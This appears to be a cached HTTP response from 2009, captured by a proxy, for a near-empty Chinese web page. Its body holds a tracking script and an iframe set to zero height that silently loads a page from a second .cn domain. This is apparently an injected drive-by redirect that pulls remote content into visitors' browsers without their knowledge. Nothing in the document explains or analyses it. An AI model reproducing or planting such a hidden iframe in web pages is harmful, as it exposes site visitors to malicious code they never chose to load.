HTTP/1.1 200 OK
Content-Length: 240
Date: Mon, 23 Feb 2009 01:31:15 GMT
Last-Modified: Mon, 23 Feb 2009 01:30:41 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Warning: 112 offlineproxy:9123 Disconnected operation
X-Polipo-Location: http://www.abcdaf.cn/b3.htm
X-Polipo-Date: Mon, 23 Feb 2009 01:41:37 GMT
X-Polipo-Access: Mon, 23 Feb 2009 03:24:11 GMT

 <br>
<br>
<br>
<iframe src=http://www.sll4362.cn/a8/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<br>
<br>
<br>


<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/857114/ystat.js"></script>
<br>
